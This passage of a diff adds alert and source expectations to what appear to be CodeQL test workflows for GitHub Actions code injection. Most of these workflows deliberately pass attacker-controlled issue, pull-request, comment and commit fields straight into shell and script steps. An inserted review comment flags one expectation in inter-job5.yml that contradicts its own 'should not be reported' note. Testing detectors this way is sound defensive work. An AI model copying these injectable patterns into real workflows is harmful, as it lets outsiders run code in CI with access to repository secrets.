+ prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical]
 with:
 result-encoding: string
 script: |
@@ -50,7 +50,7 @@ jobs:
 const file = './${{ env.file }}';
 let content = fs.readFileSync(file).toString();
 const title = '[${{ env.next_version }}]';
- const log = '${{ env.log }}';
+ const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical]
 let exists = ${{ needs.changelog.result == 'success' }};
 if (!content.includes(title)) {
@@ -63,7 +63,7 @@ jobs:
 const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1;
 if (exists && ${{ github.event.action == 'edited' }}) {
- const prevLog = '${{ env.prev_log }}';
+ const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical]
 const index = content.indexOf(prevLog, insertAt);
 if (index > -1) {
 content = content.slice(0, index) + content.slice(index + prevLog.length);
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
index a952c8c1ab8..38a6bcbd6af 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
@@ -4,8 +4,8 @@ jobs:
 echo-chamber:
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.pages[1].title }}'
- - run: echo '${{ github.event.pages[11].title }}'
- - run: echo '${{ github.event.pages[0].page_name }}'
- - run: echo '${{ github.event.pages[2222].page_name }}'
+ - run: echo '${{ github.event.pages[1].title }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.pages[11].title }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.pages[0].page_name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.pages[2222].page_name }}' # $ Alert[actions/code-injection/medium]
 - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe
\ No newline at end of file
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
index c8a30dad294..4180c7d6769 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
@@ -15,7 +15,7 @@ jobs:
 - name: Extract and Clean Initial URL
 id: extract-url
 env:
- BODY: ${{ github.event.comment.body }}
+ BODY: ${{ github.event.comment.body }} # $ Source[actions/code-injection/critical]
 run: |
 echo "::set-output name=initial_url::$BODY"
@@ -34,4 +34,4 @@ jobs:
 - name: Update Comment with New URL
 run: |
- NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}"
+ NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
index 1ad46b0f6eb..57df1a28983 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
@@ -23,7 +23,7 @@ jobs:
 id: source
 uses: tj-actions/changed-files@v40
- - name: Remove foo from changed files
+ - name: Remove foo from changed files # $ Source[actions/code-injection/medium]
 id: step
 uses: mad9000/actions-find-and-replace-string@3
 with:
@@ -40,4 +40,4 @@ jobs:
 steps:
 - id: sink
- run: echo ${{needs.job1.outputs.job_output}}
+ run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml
index 4f149a92041..d32f1f2c1a8 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml
@@ -23,7 +23,7 @@ jobs:
 id: source
 uses: tj-actions/changed-files@v40
- - name: Remove foo from changed files
+ - name: Remove foo from changed files # $ Source[actions/code-injection/medium]
 id: step
 uses: mad9000/actions-find-and-replace-string@3
 with:
@@ -40,4 +40,4 @@ jobs:
 steps:
 - id: sink
- run: echo ${{needs.job1.outputs.job_output}}
+ run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml
index 21fa789d9e7..4d838b0d465 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml
@@ -23,7 +23,7 @@ jobs:
 id: source
 uses: tj-actions/changed-files@v40
- - name: Remove foo from changed files
+ - name: Remove foo from changed files # $ Source[actions/code-injection/medium]
 id: step
 uses: mad9000/actions-find-and-replace-string@3
 with:
@@ -42,4 +42,4 @@ jobs:
 steps:
 - id: sink
- run: echo ${{needs.job1.outputs.job_output}}
+ run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml
index b964bb78dac..fc56cbc5121 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml
@@ -23,7 +23,7 @@ jobs:
 id: source
 uses: tj-actions/changed-files@v40
- - name: Remove foo from changed files
+ - name: Remove foo from changed files # $ Source[actions/code-injection/medium]
 id: step
 uses: mad9000/actions-find-and-replace-string@3
 with:
@@ -41,4 +41,4 @@ jobs:
 steps:
 - id: sink
- run: echo ${{needs.job1.outputs.job_output}}
+ run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
index d6b7b2b1b0c..d075aecd67e 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
@@ -42,4 +42,4 @@ jobs:
 steps:
 - id: sink
 # Should not be reported since job1 is not needed
- run: echo ${{needs.job1.outputs.job_output}}
+ run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
index 5e767ce0239..348fe03ec72 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
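Review bot: In the inter-job5.yml hunk the new expectation `# $ Alert[actions/code-injection/medium]` on the `run: echo ${{needs.job1.outputs.job_output}}` line contradicts the context comment directly above it, which says the step should not be reported because job1 is not in the job's `needs`. Either the comment is stale and the alert is intended, in which case it should say so, e.g. `# Should not be reported since job1 is not needed (currently reported, see expectation below)`, or the comment is right and the expectation should be dropped so the test fails on the false positive instead of pinning it. In the other visible hunks the expectations and the existing comments agree, so this appears to be the only spot where the two disagree.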
@@ -1,20 +1,20 @@
 on: issues
 env:
- global_env: ${{ github.event.issue.title }}
+ global_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical]
 test: test
 jobs:
 echo-chamber:
 env:
- job_env: ${{ github.event.issue.title }}
+ job_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical]
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.issue.title }}'
- - run: echo '${{ github.event.issue.body }}'
- - run: echo '${{ env.global_env }}'
+ - run: echo '${{ github.event.issue.title }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ env.global_env }}' # $ Alert[actions/code-injection/critical]
 - run: echo '${{ env.test }}'
- - run: echo '${{ env.job_env }}'
- - run: echo '${{ env.step_env }}'
+ - run: echo '${{ env.job_env }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ env.step_env }}' # $ Alert[actions/code-injection/critical]
 env:
- step_env: ${{ github.event.issue.title }}
+ step_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
index b17a1fecbeb..bfb4c488862 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
@@ -10,7 +10,7 @@ jobs:
 runs-on: ubuntu-latest
 if: ${{ github.event.comment.body == '/jira ticket' }}
 steps:
- - run: echo ${{ github.event.comment.body }}
+ - run: echo ${{ github.event.comment.body }} # $ Alert[actions/code-injection/critical]
 - name: Login
 uses: atlassian/gajira-login@v3
@@ -20,7 +20,7 @@ jobs:
 JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }}
 - name: SearchParam
- run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}'
+ run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' # $ Alert[actions/code-injection/critical]
 - name: Search
 id: search
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml
index ad9187a3d6b..ad5d52fcb6b 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml
@@ -41,7 +41,7 @@ jobs:
 run: |
 echo "Checking issue body for profanities..."
 PROFANITIES_LIST="bad|disguting|horrible"
- if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then
+ if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then # $ Alert[actions/code-injection/critical]
 echo "Profanity detected in issue body. Please clean up the language."
 exit 1
 else
@@ -66,7 +66,7 @@ jobs:
 uses: actions/github-script@v5
 with:
 script: |
- const commentBody = "${{ github.event.comment.body }}";
+ const commentBody = "${{ github.event.comment.body }}"; # $ Alert[actions/code-injection/critical]
 let response;
 if (commentBody.includes("hello")) {
 response = "Hello! How can I help you today?";
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml
index 826051dfc5a..bd378f61406 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml
@@ -34,4 +34,4 @@ jobs:
 pr-message: 'Message that will be displayed on users first pr'
 - name: Log test executions
 run: |
- echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information."
+ echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
index 560e69f9e4b..3ab37e1e4db 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
@@ -11,4 +11,4 @@ jobs:
 test:
 runs-on: ubuntu-latest
 steps:
- - run: echo "${{ github.event.pull_request.body }}"
+ - run: echo "${{ github.event.pull_request.body }}" # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
index d4ce7885669..01af6deeaf2 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
@@ -4,11 +4,11 @@ jobs:
 echo-chamber:
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.pull_request.title }}'
- - run: echo '${{ github.event.pull_request.body }}'
- - run: echo '${{ github.event.pull_request.head.label }}'
- - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
- - run: echo '${{ github.event.pull_request.head.repo.description }}'
- - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
- - run: echo '${{ github.event.pull_request.head.ref }}'
- - run: echo '${{ github.event.review.body }}'
+ - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.review.body }}' # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
index 5d288caad85..1b08e4a1855 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
@@ -4,11 +4,11 @@ jobs:
 echo-chamber:
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.pull_request.title }}'
- - run: echo '${{ github.event.pull_request.body }}'
- - run: echo '${{ github.event.pull_request.head.label }}'
- - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
- - run: echo '${{ github.event.pull_request.head.repo.description }}'
- - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
- - run: echo '${{ github.event.pull_request.head.ref }}'
- - run: echo '${{ github.event.comment.body }}'
+ - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
index 4ca3753f50c..da99a837568 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
@@ -6,12 +6,12 @@ jobs:
 steps:
 - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it
 - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it
- - run: echo '${{ github.event.pull_request.title }}'
- - run: echo '${{ github.event.pull_request.body }}'
- - run: echo '${{ github.event.pull_request.head.label }}'
- - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
- - run: echo '${{ github.event.pull_request.head.repo.description }}'
- - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
- - run: echo '${{ github.event.pull_request.head.ref }}'
- - run: echo '${{ github.head_ref }}'
+ - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.head_ref }}' # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
index 2006a7999da..97dfeb05c81 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
@@ -4,13 +4,13 @@ jobs:
 echo-chamber:
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.commits[11].message }}'
- - run: echo '${{ github.event.commits[11].author.email }}'
- - run: echo '${{ github.event.commits[11].author.name }}'
- - run: echo '${{ github.event.head_commit.message }}'
- - run: echo '${{ github.event.head_commit.author.email }}'
- - run: echo '${{ github.event.head_commit.author.name }}'
- - run: echo '${{ github.event.head_commit.committer.email }}'
- - run: echo '${{ github.event.head_commit.committer.name }}'
- - run: echo '${{ github.event.commits[11].committer.email }}'
- - run: echo '${{ github.event.commits[11].committer.name }}'
\ No newline at end of file
+ - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium]
\ No newline at end of file
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml
index 8b7a6df009c..f459b9b5149 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml
@@ -6,13 +6,13 @@ jobs:
 echo-chamber:
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.commits[11].message }}'
- - run: echo '${{ github.event.commits[11].author.email }}'
- - run: echo '${{ github.event.commits[11].author.name }}'
- - run: echo '${{ github.event.head_commit.message }}'
- - run: echo '${{ github.event.head_commit.author.email }}'
- - run: echo '${{ github.event.head_commit.author.name }}'
- - run: echo '${{ github.event.head_commit.committer.email }}'
- - run: echo '${{ github.event.head_commit.committer.name }}'
- - run: echo '${{ github.event.commits[11].committer.email }}'
- - run: echo '${{ github.event.commits[11].committer.name }}'
\ No newline at end of file
+ - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium]
+ - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium]
\ No newline at end of file
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
index 0c4aa93c7a5..34c2f156a09 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
@@ -33,7 +33,7 @@ jobs:
 next_version: next
 link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})'
 steps:
- - run: echo "${{ inputs.taint }}"
+ - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/medium]
 - uses: actions/checkout@v3
 with:
 ref: ${{ github.event.pull_request.head.ref }}
@@ -41,8 +41,8 @@ jobs:
 id: update
 uses: actions/github-script@v6
 env:
- log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n'
- prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n'
+ log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium]
+ prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium]
 with:
 result-encoding: string
 script: |
@@ -50,7 +50,7 @@ jobs:
 const file = './${{ env.file }}';
 let content = fs.readFileSync(file).toString();
 const title = '[${{ env.next_version }}]';
- const log = '${{ env.log }}';
+ const log = '${{ env.log }}'; # $ Alert[actions/code-injection/medium]
 let exists = ${{ needs.changelog.result == 'success' }};
 if (!content.includes(title)) {
@@ -63,7 +63,7 @@ jobs:
 const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1;
 if (exists && ${{ github.event.action == 'edited' }}) {
- const prevLog = '${{ env.prev_log }}';
+ const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/medium]
 const index = content.indexOf(prevLog, insertAt);
 if (index > -1) {
 content = content.slice(0, index) + content.slice(index + prevLog.length);
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml
index 0c4aa93c7a5..333af0376ca 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml
@@ -33,7 +33,7 @@ jobs:
 next_version: next
 link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})'
 steps:
- - run: echo "${{ inputs.taint }}"
+ - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical]
 - uses: actions/checkout@v3
 with:
 ref: ${{ github.event.pull_request.head.ref }}
@@ -41,8 +41,8 @@ jobs:
 id: update
 uses: actions/github-script@v6
 env:
- log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n'
- prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n'
+ log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical]
+ prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical]
 with:
 result-encoding: string
 script: |
@@ -50,7 +50,7 @@ jobs:
 const file = './${{ env.file }}';
 let content = fs.readFileSync(file).toString();
 const title = '[${{ env.next_version }}]';
- const log = '${{ env.log }}';
+ const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical]
 let exists = ${{ needs.changelog.result == 'success' }};
 if (!content.includes(title)) {
@@ -63,7 +63,7 @@ jobs:
 const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1;
 if (exists && ${{ github.event.action == 'edited' }}) {
- const prevLog = '${{ env.prev_log }}';
+ const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical]
 const index = content.indexOf(prevLog, insertAt);
 if (index > -1) {
 content = content.slice(0, index) + content.slice(index + prevLog.length);
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml
index a237856b6ce..3ef3f09bf56 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml
@@ -8,4 +8,4 @@ jobs:
 permissions: {}
 uses: ./.github/workflows/reusable-workflow-1.yml
 with:
- taint: ${{ github.event.pull_request.title }}
+ taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml
index 0f87d1e9394..e4c6ec03144 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml
@@ -7,4 +7,4 @@ jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml index 39dfafcf023..4ef27dca557 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -7,4 +7,4 @@ jobs: test: uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index 5390612f105..087b116464e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,8 +13,8 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['comment']['body'] }} + source: ${{ github.event['comment']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - - run: ${{ steps.source.outputs.value }} - - run: ${{ needs.test1.outputs.job_output }} + - run: ${{ steps.source.outputs.value }} # $ Alert[actions/code-injection/critical] + - run: ${{ needs.test1.outputs.job_output }} # $ Alert[actions/code-injection/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml index 94e8be89bdc..78f5c845d04 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -8,12 +8,12 @@ jobs: - id: summary uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event.head_commit.message }} # $ Source[actions/code-injection/medium] find: 'foo' replace: '' - id: flow run: | - echo "${{steps.summary.outputs.value}}" + echo "${{steps.summary.outputs.value}}" # $ Alert[actions/code-injection/medium] - id: no-flow run: | echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml index 8271f93d857..d1c7dedaa10 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -15,7 +15,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/critical] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -26,7 +26,7 @@ jobs: - name: List all changed files id: sink run: | - for file in ${{ steps.step.outputs.value }}; do + for file in ${{ steps.step.outputs.value }}; do # $ Alert[actions/code-injection/critical] echo "$file was changed" done diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index 3128aacc93c..e08ab1a8455 100644 